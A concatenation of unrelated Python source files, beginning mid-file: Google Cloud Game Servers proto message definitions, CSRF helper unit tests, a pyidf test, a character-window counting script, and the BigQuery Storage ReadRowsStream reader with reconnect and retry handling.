    # Field numbers are part of the wire format; do not renumber.
    done = proto.Field(proto.BOOL, number=1,)
    error_code = proto.Field(proto.ENUM, number=2, enum=ErrorCode,)
    error_message = proto.Field(proto.STRING, number=3,)


class LabelSelector(proto.Message):
    r"""The label selector, used to group labels on the resources.

    Attributes:
        labels (Sequence[google.cloud.gaming_v1.types.LabelSelector.LabelsEntry]):
            Resource labels for this selector.
    """

    # Map of label key -> label value; field number is wire-format stable.
    labels = proto.MapField(proto.STRING, proto.STRING, number=1,)


class RealmSelector(proto.Message):
    r"""The realm selector, used to match realm resources.

    Attributes:
        realms (Sequence[str]):
            List of realms to match.
    """

    # Repeated realm resource names; field number is wire-format stable.
    realms = proto.RepeatedField(proto.STRING, number=1,)


class Schedule(proto.Message):
    r"""The schedule of a recurring or one time event. The event's time span
    is specified by start_time and end_time. If the scheduled event's
    timespan is larger than the cron_spec + cron_job_duration, the event
    will be recurring. If only cron_spec + cron_job_duration are
    specified, the event is effective starting at the local time
    specified by cron_spec, and is recurring.

    ::

       start_time|-------[cron job]-------[cron job]-------[cron job]---|end_time
       cron job: cron spec start time + duration

    Attributes:
        start_time (google.protobuf.timestamp_pb2.Timestamp):
            The start time of the event.
        end_time (google.protobuf.timestamp_pb2.Timestamp):
            The end time of the event.
        cron_job_duration (google.protobuf.duration_pb2.Duration):
            The duration for the cron job event. The
            duration of the event is effective after the
            cron job's start time.
        cron_spec (str):
            The cron definition of the scheduled event.
            See https://en.wikipedia.org/wiki/Cron. Cron
            spec specifies the local time as defined by the
            realm.
    """

    # Field numbers are part of the wire format; do not renumber.
    start_time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
    end_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
    cron_job_duration = proto.Field(
        proto.MESSAGE, number=3, message=duration_pb2.Duration,
    )
    cron_spec = proto.Field(proto.STRING, number=4,)


class SpecSource(proto.Message):
    r"""Encapsulates Agones fleet spec and Agones autoscaler spec
    sources.

    Attributes:
        game_server_config_name (str):
            The game server config resource. Uses the form:
            ``projects/{project}/locations/{location}/gameServerDeployments/{deployment_id}/configs/{config_id}``.
        name (str):
            The name of the Agones fleet config or Agones
            scaling config used to derive the Agones fleet
            or Agones autoscaler spec.
    """

    # Field numbers are part of the wire format; do not renumber.
    game_server_config_name = proto.Field(proto.STRING, number=1,)
    name = proto.Field(proto.STRING, number=2,)


class TargetDetails(proto.Message):
    r"""Details about the Agones resources.

    Attributes:
        game_server_cluster_name (str):
            The game server cluster name. Uses the form:
            ``projects/{project}/locations/{location}/realms/{realm}/gameServerClusters/{cluster}``.
        game_server_deployment_name (str):
            The game server deployment name. Uses the form:
            ``projects/{project}/locations/{location}/gameServerDeployments/{deployment_id}``.
        fleet_details (Sequence[google.cloud.gaming_v1.types.TargetDetails.TargetFleetDetails]):
            Agones fleet details for game server clusters
            and game server deployments.
    """

    class TargetFleetDetails(proto.Message):
        r"""Details of the target Agones fleet.

        Attributes:
            fleet (google.cloud.gaming_v1.types.TargetDetails.TargetFleetDetails.TargetFleet):
                Reference to target Agones fleet.
            autoscaler (google.cloud.gaming_v1.types.TargetDetails.TargetFleetDetails.TargetFleetAutoscaler):
                Reference to target Agones fleet autoscaling
                policy.
        """

        class TargetFleet(proto.Message):
            r"""Target Agones fleet specification.

            Attributes:
                name (str):
                    The name of the Agones fleet.
                spec_source (google.cloud.gaming_v1.types.SpecSource):
                    Encapsulates the source of the Agones fleet
                    spec. The Agones fleet spec source.
            """

            name = proto.Field(proto.STRING, number=1,)
            # String message names are late-bound references resolved by
            # proto-plus after all module messages are defined.
            spec_source = proto.Field(proto.MESSAGE, number=2, message="SpecSource",)

        class TargetFleetAutoscaler(proto.Message):
            r"""Target Agones autoscaler policy reference.

            Attributes:
                name (str):
                    The name of the Agones autoscaler.
                spec_source (google.cloud.gaming_v1.types.SpecSource):
                    Encapsulates the source of the Agones fleet
                    spec. Details about the Agones autoscaler spec.
            """

            name = proto.Field(proto.STRING, number=1,)
            spec_source = proto.Field(proto.MESSAGE, number=2, message="SpecSource",)

        # Fully qualified string names reference the nested classes above;
        # they cannot be used directly here because the enclosing class is
        # still being defined.
        fleet = proto.Field(
            proto.MESSAGE,
            number=1,
            message="TargetDetails.TargetFleetDetails.TargetFleet",
        )
        autoscaler = proto.Field(
            proto.MESSAGE,
            number=2,
            message="TargetDetails.TargetFleetDetails.TargetFleetAutoscaler",
        )

    game_server_cluster_name = proto.Field(proto.STRING, number=1,)
    game_server_deployment_name = proto.Field(proto.STRING, number=2,)
    fleet_details = proto.RepeatedField(
        proto.MESSAGE, number=3, message=TargetFleetDetails,
    )


class TargetState(proto.Message):
    r"""Encapsulates the Target state.

    Attributes:
        details (Sequence[google.cloud.gaming_v1.types.TargetDetails]):
            Details about Agones fleets.
    """

    # Field number is part of the wire format; do not renumber.
    details = proto.RepeatedField(proto.MESSAGE, number=1, message="TargetDetails",)


class DeployedFleetDetails(proto.Message):
    r"""Details of the deployed Agones fleet.

    Attributes:
        deployed_fleet (google.cloud.gaming_v1.types.DeployedFleetDetails.DeployedFleet):
            Information about the Agones fleet.
        deployed_autoscaler (google.cloud.gaming_v1.types.DeployedFleetDetails.DeployedFleetAutoscaler):
            Information about the Agones autoscaler for
            that fleet.
    """

    class DeployedFleet(proto.Message):
        r"""Agones fleet specification and details.

        Attributes:
            fleet (str):
                The name of the Agones fleet.
            fleet_spec (str):
                The fleet spec retrieved from the Agones
                fleet.
            spec_source (google.cloud.gaming_v1.types.SpecSource):
                The source spec that is used to create the
                Agones fleet. The GameServerConfig resource may
                no longer exist in the system.
            status (google.cloud.gaming_v1.types.DeployedFleetDetails.DeployedFleet.DeployedFleetStatus):
                The current status of the Agones fleet.
                Includes count of game servers in various
                states.
        """

        class DeployedFleetStatus(proto.Message):
            r"""DeployedFleetStatus has details about the Agones fleets such
            as how many are running, how many allocated, and so on.

            Attributes:
                ready_replicas (int):
                    The number of GameServer replicas in the
                    READY state in this fleet.
                allocated_replicas (int):
                    The number of GameServer replicas in the
                    ALLOCATED state in this fleet.
                reserved_replicas (int):
                    The number of GameServer replicas in the
                    RESERVED state in this fleet. Reserved instances
                    won't be deleted on scale down, but won't cause
                    an autoscaler to scale up.
                replicas (int):
                    The total number of current GameServer
                    replicas in this fleet.
            """

            ready_replicas = proto.Field(proto.INT64, number=1,)
            allocated_replicas = proto.Field(proto.INT64, number=2,)
            reserved_replicas = proto.Field(proto.INT64, number=3,)
            replicas = proto.Field(proto.INT64, number=4,)

        fleet = proto.Field(proto.STRING, number=1,)
        fleet_spec = proto.Field(proto.STRING, number=2,)
        spec_source = proto.Field(proto.MESSAGE, number=3, message="SpecSource",)
        # NOTE(review): field number jumps from 3 to 5; the numbering comes
        # from the .proto definition — do not "fix" it or reuse number 4
        # without checking the upstream proto.
        status = proto.Field(
            proto.MESSAGE,
            number=5,
            message="DeployedFleetDetails.DeployedFleet.DeployedFleetStatus",
        )

    class DeployedFleetAutoscaler(proto.Message):
        r"""Details about the Agones autoscaler.

        Attributes:
            autoscaler (str):
                The name of the Agones autoscaler.
            spec_source (google.cloud.gaming_v1.types.SpecSource):
                The source spec that is used to create the
                autoscaler. The GameServerConfig resource may no
                longer exist in the system.
            fleet_autoscaler_spec (str):
                The autoscaler spec retrieved from Agones.
        """

        autoscaler = proto.Field(proto.STRING, number=1,)
        # NOTE(review): numbers 4 and 3 are intentionally out of declaration
        # order; they mirror the .proto — do not renumber.
        spec_source = proto.Field(proto.MESSAGE, number=4, message="SpecSource",)
        fleet_autoscaler_spec = proto.Field(proto.STRING, number=3,)

    deployed_fleet = proto.Field(proto.MESSAGE, number=1, message=DeployedFleet,)
    deployed_autoscaler = proto.Field(
        proto.MESSAGE, number=2, message=DeployedFleetAutoscaler,
    )


# Re-export every message type registered in this module's proto-plus manifest.
__all__ = tuple(sorted(__protobuf__.manifest))

from changes.api.serializer import Crumbler, register
from changes.models.node import Cluster


@register(Cluster)
class ClusterCrumbler(Crumbler):
    """Serializes a Cluster model into its API dictionary form."""

    def crumble(self, instance, attrs):
        cluster = instance
        return dict(
            id=cluster.id.hex,
            name=cluster.label,
            dateCreated=cluster.date_created,
        )

"""Tests for the CSRF helper."""

import unittest

import mock
import webapp2
import webtest

from ctc.helpers import csrf
from ctc.testing import testutil


# Fixed value that the mocked time.time() returns (see CsrfTests.setUp).
MOCKED_TIME = 123


# Tests don't need docstrings, so pylint: disable=C0111
# Tests can test protected members, so pylint: disable=W0212
class CsrfTests(testutil.CtcTestCase):
    """Exercises CSRF token creation, validation, and handler enforcement."""

    # Helpers

    class TestHandler(csrf.CsrfHandler):
        """A handler for testing whether or not requests are CSRF protected."""

        def get(self):
            # Expose the generated token so tests can read it from the body.
            self.response.write('CSRF Token:%s' % self.csrf_token)

        def post(self):
            pass

        def put(self):
            pass

        def delete(self):
            pass

    def setUp(self):
        super(CsrfTests, self).setUp()
        # The CSRF library uses the time, so we mock it out.
        # NOTE(review): this patches the module attribute for the whole
        # process and is never restored in tearDown — confirm that is
        # acceptable for this suite.
        self.time_mock = mock.Mock()
        csrf.time = self.time_mock
        self.time_mock.time = mock.Mock(return_value=MOCKED_TIME)
        # The handler tests need a WSGIApplication.
        app = webapp2.WSGIApplication([('/', self.TestHandler)])
        self.testapp = webtest.TestApp(app)

    def test_get_secret_key(self):
        # The key is created on first use and must be stable across calls.
        first_key = csrf._get_secret_key()
        self.assertEqual(len(first_key), 32)
        second_key = csrf._get_secret_key()
        self.assertEqual(first_key, second_key)

    def test_tokens_are_equal(self):
        # It should fail if the tokens aren't equal length.
        self.assertFalse(csrf._tokens_are_equal('a', 'ab'))
        # It should fail if the tokens are different.
        self.assertFalse(csrf._tokens_are_equal('abcde', 'abcdf'))
        # It should succeed if the tokens are the same.
        self.assertTrue(csrf._tokens_are_equal('abcde', 'abcde'))

    # Make Token

    def test_make_token_includes_time(self):
        self.login()
        # It should get the current time.
        token1 = csrf.make_token()
        self.assertEqual(token1.split()[-1], str(MOCKED_TIME))
        # It should use the provided time.
        token2 = csrf.make_token(token_time='456')
        self.assertEqual(token2.split()[-1], '456')
        # Different time should cause the digest to be different.
        self.assertNotEqual(token1.split()[0], token2.split()[0])
        token3 = csrf.make_token(token_time='456')
        self.assertEqual(token2, token3)

    def test_make_token_requires_login(self):
        # Anonymous callers get no token at all.
        token1 = csrf.make_token()
        self.assertIsNone(token1)
        self.login()
        token2 = csrf.make_token()
        self.assertIsNotNone(token2)

    def test_make_token_includes_path(self):
        self.login()
        # It should get the current path.
        self.testbed.setup_env(PATH_INFO='/action/1', overwrite=True)
        token1 = csrf.make_token(token_time='123')
        self.testbed.setup_env(PATH_INFO='/action/23', overwrite=True)
        token2 = csrf.make_token(token_time='123')
        token3 = csrf.make_token(token_time='123')
        self.assertNotEqual(token1, token2)
        self.assertEqual(token2, token3)
        # It should let the client pass in a path.
        token4 = csrf.make_token(path='/action/4', token_time='123')
        token5 = csrf.make_token(path='/action/56', token_time='123')
        token6 = csrf.make_token(path='/action/56', token_time='123')
        self.assertNotEqual(token4, token5)
        self.assertEqual(token5, token6)

    # Token Is Valid

    def test_token_is_valid(self):
        self.login()
        # Token is required.
        self.assertFalse(csrf.token_is_valid(None))
        # Token needs to have a timestamp on it.
        self.assertFalse(csrf.token_is_valid('hello'))
        # The timestamp needs to be within the current date range.
        # A far-future "now" makes the token's timestamp fall out of range.
        self.time_mock.time = mock.Mock(return_value=9999999999999)
        self.assertFalse(csrf.token_is_valid('hello 123'))
        # The user needs to be logged in.
        token = csrf.make_token()
        self.logout()
        self.assertFalse(csrf.token_is_valid(token))
        self.login()
        # Modifying the token should break everything.
        modified_token = '0' + token[1:]
        if token == modified_token:
            modified_token = '1' + token[1:]
        self.assertFalse(csrf.token_is_valid(modified_token))
        # The original token that we got should work.
        self.assertTrue(csrf.token_is_valid(token))

    def test_get_has_csrf_token(self):
        self.login()
        response = self.testapp.get('/', status=200).body
        self.assertIn('CSRF Token:', response)
        self.assertEqual(response.split(':')[-1], csrf.make_token())

    def test_mutators_require_csrf_token(self):
        self.login()
        # Mutating verbs without a token must be rejected with 403.
        self.testapp.put('/', status=403)
        self.testapp.post('/', status=403)
        self.testapp.delete('/', status=403)
        csrf_param = 'csrf_token=' + csrf.make_token(path='/')
        self.testapp.put('/', params=csrf_param, status=200)
        self.testapp.post('/', params=csrf_param, status=200)
        # Though the spec allows DELETE to have a body, it tends to be ignored
        # by servers (http://stackoverflow.com/questions/299628), and webapp2
        # ignores it as well, so we have to put the params in the URL.
        self.testapp.delete('/?' + csrf_param, status=200)


# Allow this test module to be run directly.
if __name__ == '__main__':
    unittest.main()

# encoding: utf-8

u'''MCL — Publication Folder'''

from ._base import IIngestableFolder, Ingestor, IngestableFolderView
from .interfaces import IPublication
from five import grok


class IPublicationFolder(IIngestableFolder):
    u'''Folder containing publications.'''
    # Marker interface: no members of its own beyond IIngestableFolder.


class PublicationIngestor(Ingestor):
    u'''RDF ingestor for publication.'''
    # Registers this ingestor for publication folders via grok.
    grok.context(IPublicationFolder)
    def getContainedObjectInterface(self):
        '''Return the interface that objects in this folder implement.'''
        return IPublication


class View(IngestableFolderView):
    u'''View for a publication folder'''
    # Registers this view for publication folders via grok.
    grok.context(IPublicationFolder)

import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.exterior_equipment import ExteriorFuelEquipment

log = logging.getLogger(__name__)

class TestExteriorFuelEquipment(unittest.TestCase):

    def setUp(self):
        self.fd, self.path = tempfile.mkstemp()

    def tearDown(self):
        os.remove(self.path)

    def test_create_exteriorfuelequipment(self):

        pyidf.validation_level = ValidationLevel.error

        obj = ExteriorFuelEquipment()
        # alpha
        var_name = "Name"
        obj.name = var_name
        # alpha
        var_fuel_use_type = "Electricity"
        obj.fuel_use_type = var_fuel_use_type
        # object-list
        var_schedule_name = "object-list|Schedule Name"
        obj.schedule_name = var_schedule_name
        # real
        var_design_level = 0.0
        obj.design_level = var_design_level
        # alpha
        var_enduse_subcategory = "End-Use Subcategory"
        obj.enduse_subcategory = var_enduse_subcategory

        idf = IDF()
        idf.add(obj)
        idf.save(self.path, check=False)

        with open(self.path, mode='r') as f:
            for line in f:
                log.debug(line.strip())

        idf2 = IDF(self.path)
        self.assertEqual(idf2.exteriorfuelequipments[0].name, var_name)
        self.assertEqual(idf2.exteriorfuelequipments[0].fuel_use_type, var_fuel_use_type)
        self.assertEqual(idf2.exteriorfuelequipments[0].schedule_name, var_schedule_name)
        self.assertAlmostEqual(idf2.exteriorfuelequipments[0].design_level, var_design_level)
        self.assertEqual(idf2.exteriorfuelequipments[0].enduse_subcategory, var_enduse_subcategory)
from collections import defaultdict
import codecs

def count(corpus, output_file):
    """Count length-3 character windows in *corpus* and write a report.

    Words whose length is a multiple of 3 contribute length-3 windows to
    the frequency table; all other words are collected verbatim into an
    "other" section. The report is: a header line ``<#windows> <#other>``,
    then ``<window> <count>`` lines in descending count order, then the
    sorted "other" words one per line.

    NOTE(review): this function is Python 2 only — it relies on ``xrange``
    and on ``str.decode`` over byte strings.

    Args:
        corpus: path of the input text file (whitespace-separated words).
        output_file: path of the UTF-8 report file to write.
    """
    debug = False
    dic = defaultdict(int)
    other = set()
    fout = codecs.open(output_file, 'w', 'utf8')
    try:
        # Close the input file deterministically (previously it leaked).
        with open(corpus, 'r') as fin:
            for line in fin:
                for word in line.split():
                    if len(word) % 3 == 0:
                        # Sliding stride-1 window over the first len/3 start
                        # positions. NOTE(review): if NON-overlapping trigrams
                        # were intended, this should be word[3*i:3*i+3] —
                        # confirm with the author before changing.
                        for i in xrange(len(word) // 3):
                            dic[word[i:i + 3]] += 1
                    else:
                        other.add(word)
        fout.write('%i %i\n' % (len(dic), len(other)))

        # Sort (count, window) pairs so the report is in descending count order.
        record_list = [(cnt, gram) for gram, cnt in dic.items()]
        record_list.sort()
        record_list.reverse()
        i = 0
        for cnt, gram in record_list:
            try:
                decoded = gram.decode('GBK')
            except UnicodeDecodeError:
                # Not valid GBK; emit a placeholder so the report stays aligned.
                # (Was a bare except, which hid unrelated errors.)
                print(gram)
                decoded = 'N/A'
            fout.write('%s %i\n' % (decoded, cnt))
            i += 1
            if i > 10 and debug:
                break

        # Words whose length is not a multiple of 3, sorted for stable output.
        for item in sorted(other):
            fout.write(item.decode('utf8'))
            fout.write('\n')
            i += 1
            if i > 20 and debug:
                break
    finally:
        fout.close()

# Generate window-frequency reports for both parsed corpora when run as a
# script.
if __name__ =='__main__':
    count('data/train.zh_parsed', 'output/count.zh')
    count('data/train.ja_parsed', 'output/count.ja')

# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import absolute_import

import collections
import io
import json
import time

# Optional dependency: fastavro is needed only to decode Avro row data
# (see _FASTAVRO_REQUIRED below).
try:
    import fastavro
except ImportError:  # pragma: NO COVER
    fastavro = None
import google.api_core.exceptions
import google.rpc.error_details_pb2

# Optional dependency: pandas is needed only to build DataFrames
# (see _PANDAS_REQUIRED below).
try:
    import pandas
except ImportError:  # pragma: NO COVER
    pandas = None
# Optional dependency: pyarrow is needed only to decode Arrow row data
# (see _PYARROW_REQUIRED below). An exact duplicate of this try/except
# block was removed.
try:
    import pyarrow
except ImportError:  # pragma: NO COVER
    pyarrow = None


# Exception types that are always safe to resume the read stream on.
_STREAM_RESUMPTION_EXCEPTIONS = (
    google.api_core.exceptions.ServiceUnavailable,
    # Caused by transport-level error. No status code was received.
    # https://github.com/googleapis/python-bigquery-storage/issues/262
    google.api_core.exceptions.Unknown,
)

# The Google API endpoint can unexpectedly close long-running HTTP/2 streams.
# Unfortunately, this condition is surfaced to the caller as an internal error
# by gRPC. We don't want to resume on all internal errors, so instead we look
# for error message that we know are caused by problems that are safe to
# reconnect.
_STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES = (
    # See: https://github.com/googleapis/google-cloud-python/pull/9994
    "RST_STREAM",
)

# User-facing messages for the ImportError raised when an optional
# dependency is missing.
_FASTAVRO_REQUIRED = (
    "fastavro is required to parse ReadRowResponse messages with Avro bytes."
)
_PANDAS_REQUIRED = "pandas is required to create a DataFrame"
_PYARROW_REQUIRED = (
    "pyarrow is required to parse ReadRowResponse messages with Arrow bytes."
)


class ReadRowsStream(object):
    """A stream of results from a read rows request.

    This stream is an iterable of
    :class:`~google.cloud.bigquery_storage_v1.types.ReadRowsResponse`.
    Iterate over it to fetch all row messages.

    If the fastavro library is installed, use the
    :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.rows()`
    method to parse all messages into a stream of row dictionaries.

    If the pandas and fastavro libraries are installed, use the
    :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.to_dataframe()`
    method to parse all messages into a :class:`pandas.DataFrame`.

    This object should not be created directly, but is returned by
    other methods in this library.
    """

    def __init__(
        self, client, name, offset, read_rows_kwargs, retry_delay_callback=None
    ):
        """Construct a ReadRowsStream.

        Args:
            client ( \
                ~google.cloud.bigquery_storage_v1.services. \
                    big_query_read.BigQueryReadClient \
            ):
                A GAPIC client used to reconnect to a ReadRows stream. This
                must be the GAPIC client to avoid a circular dependency on
                this class.
            name (str):
                Required. Stream ID from which rows are being read.
            offset (int):
                Required. Position in the stream to start
                reading from. The offset requested must be less than the last
                row read from ReadRows. Requesting a larger offset is
                undefined.
            read_rows_kwargs (dict):
                Keyword arguments to use when reconnecting to a ReadRows
                stream.
            retry_delay_callback (Optional[Callable[[float], None]]):
                If the client receives a retryable error that asks the client to
                delay its next attempt and retry_delay_callback is not None,
                ReadRowsStream will call retry_delay_callback with the delay
                duration (in seconds) before it starts sleeping until the next
                attempt.

        Returns:
            Iterable[ \
                ~google.cloud.bigquery_storage.types.ReadRowsResponse \
            ]:
                A sequence of row messages.
        """

        # Make a copy of the read position so that we can update it without
        # mutating the original input.
        self._client = client
        self._name = name
        self._offset = offset
        self._read_rows_kwargs = read_rows_kwargs
        self._retry_delay_callback = retry_delay_callback
        # The underlying gRPC stream; created lazily on first iteration.
        self._wrapped = None

    def __iter__(self):
        """An iterable of messages.

        Returns:
            Iterable[ \
                ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \
            ]:
                A sequence of row messages.
        """
        # Infinite loop to reconnect on reconnectable errors while processing
        # the row stream.

        if self._wrapped is None:
            self._reconnect()

        while True:
            try:
                for message in self._wrapped:
                    rowcount = message.row_count
                    # Advance the offset as messages are delivered so that a
                    # reconnect resumes right after the last yielded message.
                    self._offset += rowcount
                    yield message

                return  # Made it through the whole stream.
            except google.api_core.exceptions.InternalServerError as exc:
                # Internal errors are only resumable when the message matches
                # a known-safe pattern (e.g. RST_STREAM); anything else is
                # re-raised to the caller.
                resumable_error = any(
                    resumable_message in exc.message
                    for resumable_message in _STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES
                )
                if not resumable_error:
                    raise
            except _STREAM_RESUMPTION_EXCEPTIONS:
                # Transient error, so reconnect to the stream.
                pass
            except Exception as exc:
                # ResourceExhausted with server-provided RetryInfo is the only
                # other retryable case; the helper also sleeps for the
                # server-requested delay before we reconnect.
                if not self._resource_exhausted_exception_is_retryable(exc):
                    raise

            self._reconnect()

    def _reconnect(self):
        """Reconnect to the ReadRows stream using the most recent offset."""
        while True:
            try:
                self._wrapped = self._client.read_rows(
                    read_stream=self._name,
                    offset=self._offset,
                    **self._read_rows_kwargs
                )
                break
            except Exception as exc:
                # Retry the reconnect itself only for ResourceExhausted with
                # a server-provided RetryInfo delay.
                if not self._resource_exhausted_exception_is_retryable(exc):
                    raise

    def _resource_exhausted_exception_is_retryable(self, exc):
        """Return True (after sleeping the requested delay) when *exc* is a
        ResourceExhausted error that carries a RetryInfo detail."""
        if isinstance(exc, google.api_core.exceptions.ResourceExhausted):
            # ResourceExhausted errors are only retried if a valid
            # RetryInfo is provided with the error.
            #
            # TODO: Remove hasattr logic when we require google-api-core >= 2.2.0.
            #       ResourceExhausted added details/_details in google-api-core 2.2.0.
            details = None
            if hasattr(exc, "details"):
                details = exc.details
            elif hasattr(exc, "_details"):
                details = exc._details
            if details is not None:
                for detail in details:
                    if isinstance(detail, google.rpc.error_details_pb2.RetryInfo):
                        retry_delay = detail.retry_delay
                        if retry_delay is not None:
                            # Convert the proto Duration to float seconds,
                            # clamped at zero.
                            delay = max(
                                0,
                                float(retry_delay.seconds)
                                + (float(retry_delay.nanos) / 1e9),
                            )
                            if self._retry_delay_callback:
                                self._retry_delay_callback(delay)
                            time.sleep(delay)
                            return True
        return False

    def rows(self, read_session=None):
        """Iterate over all rows in the stream.

        This method requires the fastavro library in order to parse row
        messages in avro format.  For arrow format messages, the pyarrow
        library is required.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            read_session ( \
                Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \
            ):
                DEPRECATED.

                This argument was used to specify the schema of the rows in the
                stream, but now the first message in a read stream contains
                this information.

        Returns:
            Iterable[Mapping]:
                A sequence of rows, represented as dictionaries.
        """
        return ReadRowsIterable(self, read_session=read_session)

    def to_arrow(self, read_session=None):
        """Create a :class:`pyarrow.Table` of all rows in the stream.

        This method requires the pyarrow library and a stream using the Arrow
        format.

        Args:
            read_session ( \
                ~google.cloud.bigquery_storage_v1.types.ReadSession \
            ):
                DEPRECATED.

                This argument was used to specify the schema of the rows in the
                stream, but now the first message in a read stream contains
                this information.

        Returns:
            pyarrow.Table:
                A table of all rows in the stream.
        """
        return self.rows(read_session=read_session).to_arrow()

    def to_dataframe(self, read_session=None, dtypes=None):
        """Create a :class:`pandas.DataFrame` of all rows in the stream.

        This method requires the pandas libary to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings.

        Args:
            read_session ( \
                ~google.cloud.bigquery_storage_v1.types.ReadSession \
            ):
                DEPRECATED.

                This argument was used to specify the schema of the rows in the
                stream, but now the first message in a read stream contains
                this information.
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        if pandas is None:
            raise ImportError(_PANDAS_REQUIRED)

        return self.rows(read_session=read_session).to_dataframe(dtypes=dtypes)


class ReadRowsIterable(object):
    """An iterable of rows from a read session.

    Args:
        reader (google.cloud.bigquery_storage_v1.reader.ReadRowsStream):
            A read rows stream.
        read_session ( \
            Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \
        ):
            DEPRECATED.

            This argument was used to specify the schema of the rows in the
            stream, but now the first message in a read stream contains
            this information.
    """

    # This class is modelled after the google.cloud.bigquery.table.RowIterator
    # and aims to be API compatible where possible.

    def __init__(self, reader, read_session=None):
        self._reader = reader
        if read_session is not None:
            self._stream_parser = _StreamParser.from_read_session(read_session)
        else:
            # Deferred: the first stream message carries the schema.
            self._stream_parser = None

    @property
    def pages(self):
        """A generator of all pages in the stream.

        Returns:
            types.GeneratorType[google.cloud.bigquery_storage_v1.ReadRowsPage]:
                A generator of pages.
        """
        # Each page is an iterator of rows. But also has num_items, remaining,
        # and to_dataframe.
        for message in self._reader:
            # Only the first message contains the schema, which is needed to
            # decode the messages.
            if not self._stream_parser:
                self._stream_parser = _StreamParser.from_read_rows_response(message)
            yield ReadRowsPage(self._stream_parser, message)

    def __iter__(self):
        """Iterator for each row in all pages."""
        for page in self.pages:
            for row in page:
                yield row

    def to_arrow(self):
        """Create a :class:`pyarrow.Table` of all rows in the stream.

        This method requires the pyarrow library and a stream using the Arrow
        format.

        Returns:
            pyarrow.Table:
                A table of all rows in the stream.
        """
        record_batches = []
        for page in self.pages:
            record_batches.append(page.to_arrow())

        if record_batches:
            return pyarrow.Table.from_batches(record_batches)

        # No data, return an empty Table.
        self._stream_parser._parse_arrow_schema()
        return pyarrow.Table.from_batches([], schema=self._stream_parser._schema)

    def to_dataframe(self, dtypes=None):
        """Create a :class:`pandas.DataFrame` of all rows in the stream.

        This method requires the pandas library to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        if pandas is None:
            raise ImportError(_PANDAS_REQUIRED)

        if dtypes is None:
            dtypes = {}

        # If it's an Arrow stream, calling to_arrow, then converting to a
        # pandas dataframe is about 2x faster. This is because pandas.concat is
        # rarely no-copy, whereas pyarrow.Table.from_batches + to_pandas is
        # usually no-copy.
        try:
            record_batch = self.to_arrow()
        except NotImplementedError:
            pass
        else:
            df = record_batch.to_pandas()
            for column in dtypes:
                df[column] = pandas.Series(df[column], dtype=dtypes[column])
            return df

        frames = [page.to_dataframe(dtypes=dtypes) for page in self.pages]

        if frames:
            return pandas.concat(frames)

        # No data, construct an empty dataframe with columns matching the schema.
        # The result should be consistent with what an empty ARROW stream would produce.
        self._stream_parser._parse_avro_schema()
        schema = self._stream_parser._avro_schema_json

        column_dtypes = self._dtypes_from_avro(schema["fields"])
        column_dtypes.update(dtypes)

        df = pandas.DataFrame(columns=column_dtypes.keys())
        for column in df:
            df[column] = pandas.Series([], dtype=column_dtypes[column])

        return df

    def _dtypes_from_avro(self, avro_fields):
        """Determine Pandas dtypes for columns in Avro schema.

        Args:
            avro_fields (Iterable[Mapping[str, Any]]):
                Avro fields' metadata.

        Returns:
            collections.OrderedDict[str, str]:
                Column names with their corresponding Pandas dtypes.
        """
        result = collections.OrderedDict()

        type_map = {"long": "int64", "double": "float64", "boolean": "bool"}

        for field_info in avro_fields:
            # BUGFIX: always start from this field's own type. Previously
            # ``type_info`` was only assigned inside the union branch below,
            # so a non-union field raised NameError (first field) or silently
            # reused the previous field's type.
            type_info = field_info["type"]

            # If a type is an union of multiple types, pick the first type
            # that is not "null".
            if isinstance(type_info, list):
                type_info = next(item for item in type_info if item != "null")

            if isinstance(type_info, str):
                field_dtype = type_map.get(type_info, "object")
            else:
                # Complex (dict) type: only timestamp-micros gets a dedicated
                # dtype; everything else falls back to object.
                logical_type = type_info.get("logicalType")
                if logical_type == "timestamp-micros":
                    field_dtype = "datetime64[ns, UTC]"
                else:
                    field_dtype = "object"

            result[field_info["name"]] = field_dtype

        return result


class ReadRowsPage(object):
    """One message's worth of rows, exposed as an iterator.

    Args:
        stream_parser (google.cloud.bigquery_storage_v1.reader._StreamParser):
            A helper for parsing messages into rows.
        message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse):
            A message of data from a read rows stream.
    """

    # This class is modeled after google.api_core.page_iterator.Page and aims
    # to provide API compatibility where possible.

    def __init__(self, stream_parser, message):
        self._stream_parser = stream_parser
        self._message = message
        self._iter_rows = None
        self._num_items = message.row_count
        self._remaining = message.row_count

    def _parse_rows(self):
        """Decode the message into a row iterator, at most once."""
        if self._iter_rows is None:
            self._iter_rows = iter(self._stream_parser.to_rows(self._message))

    @property
    def num_items(self):
        """int: Total items in the page."""
        return self._num_items

    @property
    def remaining(self):
        """int: Remaining items in the page."""
        return self._remaining

